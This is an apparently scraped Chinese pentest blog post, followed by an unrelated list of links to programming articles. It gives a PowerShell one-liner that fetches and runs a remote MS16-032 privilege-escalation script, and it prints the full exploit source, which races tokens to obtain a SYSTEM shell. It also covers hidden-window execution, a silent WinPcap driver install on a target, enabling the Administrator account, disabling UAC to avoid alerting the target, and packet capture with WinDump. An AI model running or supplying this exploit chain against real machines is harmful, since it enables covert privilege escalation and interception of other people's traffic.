publicstr

MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包

0x01 MS16-023提权

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c start cmd /k echo Hello, World!'"

从远程下载执行一个PowerShell脚本，并新开一个System权限的窗口。

(虚拟机调成2个CPU及以上，才能运行成功）

也可以自己修改PowerShell脚本，在最前两行修改命令。

powershell -nop -ep bypass -File MS16-023.ps1

#=================修改此处命令==================#

$Application = "cmd.exe"

$Commandline = "/c start cmd /k echo Hello, World!"

#===============================================#

Add-Type -TypeDefinition @"

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

[StructLayout(LayoutKind.Sequential)]

public struct PROCESS_INFORMATION

{

public IntPtr hProcess;

public IntPtr hThread;

public int dwProcessId;

public int dwThreadId;

}

[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]

public struct STARTUPINFO

{

public Int32 cb;

public string lpReserved;

public string lpDesktop;

public string lpTitle;

public Int32 dwX;

public Int32 dwY;

public Int32 dwXSize;

public Int32 dwYSize;

public Int32 dwXCountChars;

public Int32 dwYCountChars;

public Int32 dwFillAttribute;

public Int32 dwFlags;

public Int16 wShowWindow;

public Int16 cbReserved2;

public IntPtr lpReserved2;

public IntPtr hStdInput;

public IntPtr hStdOutput;

public IntPtr hStdError;

}

[StructLayout(LayoutKind.Sequential)]

public struct SQOS

{

public int Length;

public int ImpersonationLevel;

public int ContextTrackingMode;

public bool EffectiveOnly;

}

public static class Advapi32

{

[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]

public static extern bool CreateProcessWithLogonW(

String userName,

String domain,

String password,

int logonFlags,

String applicationName,

String commandLine,

int creationFlags,

int environment,

String currentDirectory,

ref STARTUPINFO startupInfo,

out PROCESS_INFORMATION processInformation);

[DllImport("advapi32.dll", SetLastError=true)]

public static extern bool SetThreadToken(

ref IntPtr Thread,

IntPtr Token);

[DllImport("advapi32.dll", SetLastError=true)]

public static extern bool OpenThreadToken(

IntPtr ThreadHandle,

int DesiredAccess,

bool OpenAsSelf,

out IntPtr TokenHandle);

[DllImport("advapi32.dll", SetLastError=true)]

public static extern bool OpenProcessToken(

IntPtr ProcessHandle,

int DesiredAccess,

ref IntPtr TokenHandle);

[DllImport("advapi32.dll", SetLastError=true)]

public extern static bool DuplicateToken(

IntPtr ExistingTokenHandle,

int SECURITY_IMPERSONATION_LEVEL,

ref IntPtr DuplicateTokenHandle);

}

public static class Kernel32

{

[DllImport("kernel32.dll")]

public static extern uint GetLastError();

[DllImport("kernel32.dll", SetLastError=true)]

public static extern IntPtr GetCurrentProcess();

[DllImport("kernel32.dll", SetLastError=true)]

public static extern IntPtr GetCurrentThread();

[DllImport("kernel32.dll", SetLastError=true)]

public static extern int GetThreadId(IntPtr hThread);

[DllImport("kernel32.dll", SetLastError = true)]

public static extern int GetProcessIdOfThread(IntPtr handle);

[DllImport("kernel32.dll",SetLastError=true)]

public static extern int SuspendThread(IntPtr hThread);

[DllImport("kernel32.dll",SetLastError=true)]

public static extern int ResumeThread(IntPtr hThread);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool TerminateProcess(

IntPtr hProcess,

uint uExitCode);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool CloseHandle(IntPtr hObject);

[DllImport("kernel32.dll", SetLastError=true)]

public static extern bool DuplicateHandle(

IntPtr hSourceProcessHandle,

IntPtr hSourceHandle,

IntPtr hTargetProcessHandle,

ref IntPtr lpTargetHandle,

int dwDesiredAccess,

bool bInheritHandle,

int dwOptions);

}

public static class Ntdll

{

[DllImport("ntdll.dll", SetLastError=true)]

public static extern int NtImpersonateThread(

IntPtr ThreadHandle,

IntPtr ThreadToImpersonate,

ref SQOS SecurityQualityOfService);

}

"@

function Get-ThreadHandle {

# StartupInfo Struct

$StartupInfo = New-Object STARTUPINFO

$StartupInfo.dwFlags = 0x00000101 # STARTF_USESTDHANDLES

$StartupInfo.wShowWindow = 0;

$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()

$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()

$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()

$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size

# ProcessInfo Struct

$ProcessInfo = New-Object PROCESS_INFORMATION

# CreateProcessWithLogonW --> lpCurrentDirectory

$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED

$CallResult = [Advapi32]::CreateProcessWithLogonW(

"user", "domain", "pass",

0x00000002, "C:\Windows\System32\notepad.exe", "",

0x00000004, $null, $GetCurrentPath,

[ref]$StartupInfo, [ref]$ProcessInfo)

# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS

$lpTargetHandle = [IntPtr]::Zero

$CallResult = [Kernel32]::DuplicateHandle(

$ProcessInfo.hProcess, 0x4,

[Kernel32]::GetCurrentProcess(),

[ref]$lpTargetHandle, 0, $false,

0x00000002)

# Clean up suspended process

$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

$lpTargetHandle

}

function Get-SystemToken {

echo "`n[?] Trying thread handle: $Thread"

echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"

$CallResult = [Kernel32]::SuspendThread($Thread)

if ($CallResult -ne 0) {

echo "[!] $Thread is a bad thread, moving on.."

Return

} echo "[+] Thread suspended"

echo "[>] Wiping current impersonation token"

$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)

if (!$CallResult) {

echo "[!] SetThreadToken failed, moving on.."

$CallResult = [Kernel32]::ResumeThread($Thread)

echo "[+] Thread resumed!"

Return

}

echo "[>] Building SYSTEM impersonation token"

# SecurityQualityOfService struct

$SQOS = New-Object SQOS

$SQOS.ImpersonationLevel = 2 #SecurityImpersonation

$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)

# Undocumented API's, I like your style Microsoft ;)

$CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)

if ($CallResult -ne 0) {

echo "[!] NtImpersonateThread failed, moving on.."

$CallResult = [Kernel32]::ResumeThread($Thread)

echo "[+] Thread resumed!"

Return

}

$script:SysTokenHandle = [IntPtr]::Zero

# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE

$CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)

if (!$CallResult) {

echo "[!] OpenThreadToken failed, moving on.."

$CallResult = [Kernel32]::ResumeThread($Thread)

echo "[+] Thread resumed!"

Return

}

echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"

echo "[+] Resuming thread.."

$CallResult = [Kernel32]::ResumeThread($Thread)

}

# main() <--- ;)

$ms16032 = @"

__ __ ___ ___ ___ ___ ___ ___

| V | _|_ | | _|___| |_ |_ |

| |_ |_| |_| . |___| | |_ | _|

|_|_|_|___|_____|___| |___|___|___|

[by b33f -> @FuzzySec]

"@

$ms16032

# Check logical processor count, race condition requires 2+

echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"

if ($([System.Environment]::ProcessorCount) -lt 2) {

echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"

Return

}

# Create array for Threads & TID's

$ThreadArray = @()

$TidArray = @()

echo "[>] Duplicating CreateProcessWithLogonW handles.."

# Loop Get-ThreadHandle and collect thread handles with a valid TID

for ($i=0; $i -lt 500; $i++) {

$hThread = Get-ThreadHandle

$hThreadID = [Kernel32]::GetThreadId($hThread)

# Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray

if ($TidArray -notcontains $hThreadID) {

$TidArray += $hThreadID

if ($hThread -ne 0) {

$ThreadArray += $hThread # This is what we need!

}

}

}

if ($($ThreadArray.length) -eq 0) {

echo "[!] No valid thread handles were captured, exiting!"

Return

} else {

echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"

echo "`n[?] Thread handle list:"

$ThreadArray

}

echo "`n[*] Sniffing out privileged impersonation token.."

foreach ($Thread in $ThreadArray){

# Get handle to SYSTEM access token

Get-SystemToken

echo "`n[*] Sniffing out SYSTEM shell.."

echo "`n[>] Duplicating SYSTEM token"

$hDuplicateTokenHandle = [IntPtr]::Zero

$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)

# Simple PS runspace definition

echo "[>] Starting token race"

$Runspace = [runspacefactory]::CreateRunspace()

$StartTokenRace = [powershell]::Create()

$StartTokenRace.runspace = $Runspace

$Runspace.Open()

[void]$StartTokenRace.AddScript({

Param ($Thread, $hDuplicateTokenHandle)

while ($true) {

$CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)

}

}).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)

$AscObj = $StartTokenRace.BeginInvoke()

echo "[>] Starting process race"

# Adding a timeout (10 seconds) here to safeguard from edge-cases

$SafeGuard = [diagnostics.stopwatch]::StartNew()

while ($SafeGuard.ElapsedMilliseconds -lt 10000) {

# StartupInfo Struct

$StartupInfo = New-Object STARTUPINFO

$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size

$StartupInfo.dwFlags = 0x00000101 # STARTF_USESTDHANDLES

$StartupInfo.wShowWindow = 0;

# ProcessInfo Struct

$ProcessInfo = New-Object PROCESS_INFORMATION

# CreateProcessWithLogonW --> lpCurrentDirectory

$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED

$CallResult = [Advapi32]::CreateProcessWithLogonW(

"user", "domain", "pass",

0x00000002, $Application,$Commandline,

0x00000004, $null, $GetCurrentPath,

[ref]$StartupInfo, [ref]$ProcessInfo)

#---

# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.

#---

# Missing this check used to cause the exploit to fail sometimes.

# If CreateProcessWithLogon fails OpenProcessToken won't succeed

# but we obviously don't have a SYSTEM shell :'( . Should be 100%

# reliable now!

#---

if (!$CallResult) {

continue

}

$hTokenHandle = [IntPtr]::Zero

$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

# If we can't open the process token it's a SYSTEM shell!

if (!$CallResult) {

echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"

$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)

$StartTokenRace.Stop()

$SafeGuard.Stop()

Return

}

# Clean up suspended process

$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)

$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)

}

# Kill runspace & stopwatch if edge-case

$StartTokenRace.Stop()

$SafeGuard.Stop()

}

C++版的地址在：

https://www.exploit-db.com/exploits/39574

但总卡死在CreateProcessWithLogonW函数上，无法正常执行。

前3个参数user、domain、pass可以随便写 L"xxx"

LOGON_NETCREDENTIALS_ONLY, //第四个参数

第五、六个参数自定两个wchar_t 数组指针，装目标application名和cmd命令

CREATE_SUSPENDED,//第七个参数

NULL,//第八个参数

第九个参数是当前路径

第10、11个参数是两个结构体指针，需要在前边定义

同时还需要考虑对方机器上的vc++运行库版本。

wmic查看已安装程序：

wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_Product

隐藏提权过程窗口、成功后自动关闭旧cmd.exe的命令：

powershell -nop -ep bypass -windowstyle hidden -File MS16-032.ps1 & exit

powershell -nop -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c start cmd /k echo Hello, World!'" & exit

这样执行，会看到立马窗口消失，执行完命令也不会有进程停留。

0x02 静默安装WinPcap

使用WinDump抓包或者wireshark都需要安装WinPcap，希望它不需要点击即可安装。

我已用sandbox沙盒提取了它安装包释放的文件位置，在和目标相同环境的机子上安装后，提取文件即可：

1、释放dll和sys文件

结构

按照这样的结构，把文件放好到目标机中，主要是Windows目录下的东西，一样也不能少。

2、注册服务

如果就这样执行winDump，会提示分配空间不足的问题，需要注册服务

sc的格式很奇怪，只能等号后有空格，请完全按照此行复制。

sc create npf binPath= "System32\drivers\npf.sys" type= "kernel" start= "auto" error= "normal" tag= "no" DisplayName= "NetGroup Packet Filter Driver"

sc start npf

接下来就可以正常使用WinDump了。

0x03 关于用户以及关闭UAC

1、关于Administrator用户

administrator本来是空密码的，且未激活的，在控制面板中无法对这个用户修改，用runas也无法登录空密码用户。

如果一定要让这个用户出现，作为其他用户一样，可以在欢迎界面登录使用：

net user administrator /active:yes

可以为它修改密码后，再runas使用，但会在欢迎界面看到多出来这个账户

runas /user:administrator cmd

就是以administrator身份打开一个cmd窗口

2、UAC访问控制

防止让渗透目标弹窗，注意以下命令，需administrator或system权限，且重启后生效！

关闭UAC：

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启UAC：

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

重启后生效！

3、抓包前的其他信息收集

tasklist /SVC /FO TABLE

用来列出进程对应的服务

tasklist /V /FO CSV >> C:\1.csv

把进程的详细信息导出到csv中，方便程序处理。

tasklist /V /FO list

则比较方便观看。

netstat /r

显示网卡接口列表、路由表。

netstat /abno

进程、PID、内外地址端口、连接状态。

netstat -anp | grep sshd

Linux下的监测ssh连接情况命令

top -d 3

Linux下动态3秒一次刷新，监测资源

http://www.microsoft.com/en-us/download/details.aspx?id=4865

在自己的电脑可以安装微软的 Microsoft Network Monitor3.4

比wireshark强的功能是，可以方便的在左侧列出进程，进程下的几个网络会话，并查看数据。相当于能看到数据的性能管理器网络功能。

本机监控还可以用Process Hacker

看进程运行账户、进程父子关系、dll对磁盘的读写、进程加载的dll列表，都很方便。

0x04 C++调用api获取端口与进程的对应

可以根据端口找进程，也可以根据进程找端口，调用的是底层dll中的函数，直接加载入工程。

原理如下：

https://www.cnblogs.com/BoyXiao/archive/2012/02/20/2359273.html

以下是能直接编译通过的代码demo：

https://blog.csdn.net/change518/article/details/7473475

可以自己定制，实现持续记录netstat信息。

0x05 WinDump使用

整体而言，先写参数，所有参数写完，最后跟上过滤语句即可。

windump -D

大写的D，列出来当前网络接口

windump -i 2

选择第2个网络接口并进行监听

windump -i 2 -l

小写的L，可以实时看到每条数据表的收发端口、地址

windump -i 2 -v

实时输出数据包信息，和-l类似

但是希望更详细可以-vv -vvv

windump -i 2 -X

大写的X参数，输出每个包的详细Ascii / Hex 显示

windump -i 2 -X ip host 127.0.0.1

或者 ip src或者 ip dst用来过滤ip

写成192.168.1也可以过滤整个网段

windump -i 2 -X ip host 127.0.0.1 && port 80,443

限定端口，逗号隔开即可

windump -i 2 -c 5 -C 1

-c 5表示只接受5个包就停止

-C 1表示接受到1MB就停止

windump -i 2 -c 10 -s 2000 -w 1.pcap

-s 2000表示每个包读2000字节，实际一个包一般1400+

不设此参数，每个包都抓不全

-w 1.pcap就是保存的文件名

所以，最终：

WinDump.exe -i 3 -X -s 2000 -C 10 -c 1000 -w 1.pcap port 443

你可能感兴趣的:(MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包)

element实现动态路由+面包屑软件技术NINI vue案例 vue.js 前端
el-breadcrumb是ElementUI组件库中的一个面包屑导航组件，它用于显示当前页面的路径，帮助用户快速理解和导航到应用的各个部分。在Vue.js项目中，如果你已经安装了ElementUI，就可以很方便地使用el-breadcrumb组件。以下是一个基本的使用示例：安装ElementUI（如果你还没有安装的话）:你可以通过npm或yarn来安装ElementUI。bash复制代码npmi
理解Gunicorn：Python WSGI服务器的基石范范0825 ipython linux 运维
理解Gunicorn：PythonWSGI服务器的基石介绍Gunicorn，全称GreenUnicorn，是一个为PythonWSGI（WebServerGatewayInterface）应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具，Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置，帮助初学者快速上手。1.什么是Gunico
Python数据分析与可视化实战指南 William数据分析 python python 数据
在数据驱动的时代，Python因其简洁的语法、强大的库生态系统以及活跃的社区，成为了数据分析与可视化的首选语言。本文将通过一个详细的案例，带领大家学习如何使用Python进行数据分析，并通过可视化来直观呈现分析结果。一、环境准备1.1安装必要库在开始数据分析和可视化之前，我们需要安装一些常用的库。主要包括pandas、numpy、matplotlib和seaborn等。这些库分别用于数据处理、数学
linux sdl windows.h,Windows下的SDL安装奔跑吧linux内核 linux sdl windows.h
首先你要下载并安装SDL开发包。如果装在C盘下，路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤：1.打开VC++，点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4，现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
Python教程：一文了解使用Python处理XPath 旦莫 Python进阶 python 开发语言
目录1.环境准备1.1安装lxml1.2验证安装2.XPath基础2.1什么是XPath？2.2XPath语法2.3示例XML文档3.使用lxml解析XML3.1解析XML文档3.2查看解析结果4.XPath查询4.1基本路径查询4.2使用属性查询4.3查询多个节点5.XPath的高级用法5.1使用逻辑运算符5.2使用函数6.实战案例6.1从网页抓取数据6.1.1安装Requests库6.1.2代
PHP环境搭建详细教程好看资源平台前端 php
PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
使用LLaVa和Ollama实现多模态RAG示例 llzwxh888 python 人工智能开发语言
本文将详细介绍如何使用LLaVa和Ollama实现多模态RAG（检索增强生成），通过提取图像中的结构化数据、生成图像字幕等功能来展示这一技术的强大之处。安装环境首先，您需要安装以下依赖包：!pipinstallllama-index-multi-modal-llms-ollama!pipinstallllama-index-readers-file!pipinstallunstructured!p
GitHub上克隆项目 bigbig猩猩 github
从GitHub上克隆项目是一个简单且直接的过程，它允许你将远程仓库中的项目复制到你的本地计算机上，以便进行进一步的开发、测试或学习。以下是一个详细的步骤指南，帮助你从GitHub上克隆项目。一、准备工作1.安装Git在克隆GitHub项目之前，你需要在你的计算机上安装Git工具。Git是一个开源的分布式版本控制系统，用于跟踪和管理代码变更。你可以从Git的官方网站（https://git-scm.
Python 实现图片裁剪（附代码） | Python工具剑客阿良_ALiang
前言本文提供将图片按照自定义尺寸进行裁剪的工具方法，一如既往的实用主义。环境依赖ffmpeg环境安装，可以参考我的另一篇文章：windowsffmpeg安装部署_阿良的博客-CSDN博客本文主要使用到的不是ffmpeg，而是ffprobe也在上面这篇文章中的zip包中。ffmpy安装：pipinstallffmpy-ihttps://pypi.douban.com/simple代码不废话了，上代码
第六集如何安装CentOS7.0，3分钟学会centos7安装教程 date分享
从光盘引导系统按回车键继续进入引导程序安装界面，选择语言这里选择简体中文版点击继续选择桌面安装下面给系统分区选择磁盘，点击完成选择基本分区，点击加号swap分区,大小填内存的两倍在选择根分区，使用所有可用的磁盘空间选择文件系统ext4点击完成，点击开始安装设置root密码，点击完成设置普通用户和密码，点击完成整个过程持续八分钟左右根据个人配置不同，时间长短不同好，现在点击重启系统进入重启状态点击本
Python爬虫解析工具之xpath使用详解 eqa11 python 爬虫开发语言
文章目录Python爬虫解析工具之xpath使用详解一、引言二、环境准备1、插件安装2、依赖库安装三、xpath语法详解1、路径表达式2、通配符3、谓语4、常用函数四、xpath在Python代码中的使用1、文档树的创建2、使用xpath表达式3、获取元素内容和属性五、总结Python爬虫解析工具之xpath使用详解一、引言在Python爬虫开发中，数据提取是一个至关重要的环节。xpath作为一门
2019-08-16 希望在东方
《春游荣华山》春游荣华山，乍暖还寒。青苔路，石阶险。山路弯上弯！为寻古寺往幽探。细雨已润江南岸，初春芳草现。老树新芽冒枝端，人间又过到新年。今游荣华山，树茂参天，古寺悠闲。细雨飘落发端！三眼井旁，投币许心愿，并祷一世安然。更喜大女明事端，应心安，放开颜。修竹静默，雨中吐心愿。待得春风浩吹时，春笋节节攀。图片发自App图片发自App图片发自App
Linux MariaDB使用OpenSSL安装SSL证书 Meta39 MySQL Oracle MariaDB Linux Windows ssl linux mariadb
进入到证书存放目录，批量删除.pem证书警告：确保已经进入到证书存放目录find.-typef-iname\*.pem-delete查看是否安装OpenSSLopensslversion没有则安装yuminstallopensslopenssl-devel开启SSL编辑/etc/my.cnf文件（没有的话就创建，但是要注意，在/etc/my.cnf.d/server.cnf配置了datadir的，
【六】阿伟开始搭建Kafka学习环境能源恒观中间件学习 kafka spring
阿伟开始搭建Kafka学习环境概述上一篇文章阿伟学习了Kafka的核心概念，并且把市面上流行的消息中间件特性进行了梳理和对比，方便大家在学习过程中进行对比学习，最后梳理了一些Kafka使用中经常遇到的Kafka难题以及解决思路，经过上一篇的学习我相信大家对Kafka有了初步的认识，本篇将继续学习Kafka。一、安装和配置学习一项技术首先要搭建一套服务，而Kafka的运行主要需要部署jdk、zook
openssl+keepalived安装部署 _小亦_ 项目部署 keepalived openssl
文章目录OpenSSL安装下载地址编译安装修改系统配置版本Keepalived安装下载地址安装遇到问题安装完成配置文件keepalived运行检查运行状态查看系统日志修改服务service重新加载systemd检查配置文件语法错误OpenSSL安装下载地址考虑到后面设备可能没法连接到外网，所以采用安装包的方式进行部署，下载地址：https://www.openssl.org/source/old/
1分钟解决 -bash: mvn: command not found，在Centos 7中安装Maven Energet!c 开发语言
1分钟解决-bash:mvn:commandnotfound，在Centos7中安装Maven检查Java环境1下载Maven2解压Maven3配置环境变量4验证安装5常见问题与注意事项6总结检查Java环境Maven依赖Java环境，请确保系统已经安装了Java并配置了环境变量。可以通过以下命令检查：java-version如果未安装，请先安装Java。1下载Maven从官网下载：前往Apach
Python实现简单的机器学习算法 master_chenchengg python python 办公效率 python开发 IT
Python实现简单的机器学习算法开篇：初探机器学习的奇妙之旅搭建环境：一切从安装开始必备工具箱第一步：安装Anaconda和JupyterNotebook小贴士：如何配置Python环境变量算法初体验：从零开始的Python机器学习线性回归：让数据说话数据准备：从哪里找数据编码实战：Python实现线性回归模型评估：如何判断模型好坏逻辑回归：从分类开始理论入门：什么是逻辑回归代码实现：使用skl
CentOS 7官方源停服，配置本机光盘yum源码哝小鱼 linux运维 centos linux 运维
1、挂载系统光盘mkdir/mnt/isomount-oloop/tools/CentOS-7-x86_64-DVD-1810.iso/mnt/isocd/mnt/iso/Packages/rpm-ivh/mnt/iso/Packages/yum-utils-1.1.31-50.el7.noarch.rpm(图形界面安装，默契已安装）如安装yum-utils依赖错误，按提示安装依赖包rpm-ivh
Linux查看服务器日志 TPBoreas 运维 linux 运维
一、tail这个是我最常用的一种查看方式用法如下：tail-n10test.log查询日志尾部最后10行的日志;tail-n+10test.log查询10行之后的所有日志;tail-fn10test.log循环实时查看最后1000行记录(最常用的)一般还会配合着grep用，(实时抓包)例如:tail-fn1000test.log|grep'关键字'（动态抓包）tail-fn1000test.log
Python入门之Lesson2:Python基础语法小熊同学哦 Python入门课程 python 开发语言算法数据结构青少年编程
目录前言一.介绍1.变量和数据类型2.常见运算符3.输入输出4.条件语句5.循环结构二.练习三.总结前言欢迎来到《Python入门》系列博客的第二课。在上一课中，我们了解了Python的安装及运行环境的配置。在这一课中，我们将深入学习Python的基础语法，这是编写Python代码的根基。通过本节内容的学习，你将掌握变量、数据类型、运算符、输入输出、条件语句等Python编程的基础知识。一.介绍1
react-intl——react国际化使用方案苹果酱0567 面试题汇总与解析 java 开发语言中间件 spring boot 后端
国际化介绍i18n：internationalization国家化简称，首字母+首尾字母间隔的字母个数+尾字母，类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
06选课支付模块之基于消息队列发送支付通知消息 echo 云清学成在线 java rabbitmq 消息队列支付通知学成在线
消息队列发送支付通知消息需求分析订单服务作为通用服务，在订单支付成功后需要将支付结果异步通知给其他对接的微服务，微服务收到支付结果根据订单的类型去更新自己的业务数据技术方案使用消息队列进行异步通知需要保证消息的可靠性即生产端将消息成功通知到服务端：消息发送到交换机-->由交换机发送到队列-->消费者监听队列，收到消息进行处理，参考文章02-使用Docker安装RabbitMQ-CSDN博客生产者确
【Bugs】Python：“ModuleNotFoundError: No module named ‘XXX‘” 系'辞工具箱 python bug anaconda
问题描述Python使用库的前提是必须已安装了相应的库，往往利用“命令行指令”实现安装，一般安装解法类似。但，还是具有延伸问题，本博客对此作记录。【1】Nomodulenamed‘seaborn’(1.1):情况1：为Anaconda安装【图1-2】.定位Anaconda路径【图3】.Anaconda路径加入Path>&
遥感影像的切片处理 sand&wich 计算机视觉 python 图像处理
在遥感影像分析中，经常需要将大尺寸的影像切分成小片段，以便于进行详细的分析和处理。这种方法特别适用于机器学习和图像处理任务，如对象检测、图像分类等。以下是如何使用Python和OpenCV库来实现这一过程，同时确保每个影像片段保留正确的地理信息。准备环境首先，确保安装了必要的Python库，包括numpy、opencv-python和xml.etree.ElementTree。这些库将用于图像处理
Vue( ElementUI入门、vue-cli安装) m0_l5z elementui vue.js
一.ElementUI入门目录：1.ElementUI入门1.1ElementUI简介1.2Vue+ElementUI安装1.3开发示例2.搭建nodejs环境2.1nodejs介绍2.2npm是什么2.3nodejs环境搭建2.3.1下载2.3.2解压2.3.3配置环境变量2.3.4配置npm全局模块路径和cache默认安装位置2.3.5修改npm镜像提高下载速度2.3.6验证安装结果3.运行n
2023最详细的Python安装教程（Windows版本）程序员林哥 Python python windows 开发语言
python安装是学习pyhon第一步，很多刚入门小白不清楚如何安装python，今天我来带大家完成python安装与配置，跟着我一步步来，很简单，你肯定能完成。第一部分：python安装（一）准备工作1、下载和安装python(认准官方网站)当然你不想去下载的话也可以分享给你，还有入门学习教程，点击下方卡片跳转进群领取（二）开始安装对于Windows操作系统，可以下载“executableins
Python实现TIFF 文件转换为 PNG 和 JPG 格式 sand&wich python 开发语言
在日常的图像处理工作中，可能会遇到需要将TIFF格式的图像转换为其他格式的情况，例如PNG和JPG。下面，本文将介绍如何使用Python和GDAL库实现这一功能。准备工作在开始之前，请确保已经安装了必要的库：GDAL（GeospatialDataAbstractionLibrary）可以使用以下命令安装GDAL：pipinstallgdal代码实现以下是一个将TIFF文件转换为PNG文件的示例代码
ubuntu安装wordpress lissettecarlr
1安装nginx网上安装方式很多，这就就直接用apt-get了apt-getinstallnginx不用启动啥，然后直接在浏览器里面输入IP:80就能看到nginx的主页了。如果修改了一些配置可以使用下列命令重启一下systemctlrestartnginx.service2安装mysql输入安装前也可以更新一下软件源，在安装过程中将会让你输入数据库的密码。sudoapt-getinstallmy
天猫返利网哪个最好?天猫返利网站有哪些? 优惠券高省
关于哪个返利网站好用，今天汐儿给大家介绍以下十大网站，可以作为参考：1、高省网【高省APP】（邀请码：668666）全网佣金最高。手机应用商店搜索“高省”即可免费下载安装，填写高省邀请码：668666，直升2皇冠，享更高佣金及分红奖励。高省APP全网佣金最高，手机应用商店搜索“高省”即可下载，高省邀请码：668666，此码注册，直升2皇冠，佣金更高！送万元推广大礼包，教你如何1年做到百万团队。其实
计算机毕业设计PHP仓储综合管理系统（源码+程序+VUE+lw+部署） java毕设程序源码王哥 php 课程设计 vue.js
该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置：phpStudy+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术：原生PHP++Vue等等组成，B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境：最好是小皮phpstudy最新版，我们在这个版本上开发的。其他版本理论上也可以。2.开发
多线程编程之join()方法周凡杨 java JOIN 多线程编程线程
现实生活中，有些工作是需要团队中成员依次完成的，这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人，如何保证T2在T1执行完后执行，T3在T2执行完后执行？问题分析：首先问题中有三个实体，T1、T2、T3，因为是多线程编程，所以都要设计成线程类。关键是怎么保证线程能依次执行完呢？ Java实现过程如下： public class T1 implements Runnabl
java中switch的使用 bingyingao java enum break continue
java中的switch仅支持case条件仅支持int、enum两种类型。用enum的时候，不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
hive having count 不能去重 daizj hive 去重 having count 计数
hive在使用having count()是，不支持去重计数 hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10; FAILED: SemanticExcep
WebSphere对JSP的缓存周凡杨 WAS JSP 缓存
对于线网上的工程，更新JSP到WebSphere后，有时会出现修改的jsp没有起作用，特别是改变了某jsp的样式后，在页面中没看到效果，这主要就是由于websphere中缓存的缘故，这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存，就要找到WAS安装后的根目录。现服务
设计模式总结朱辉辉33 java 设计模式
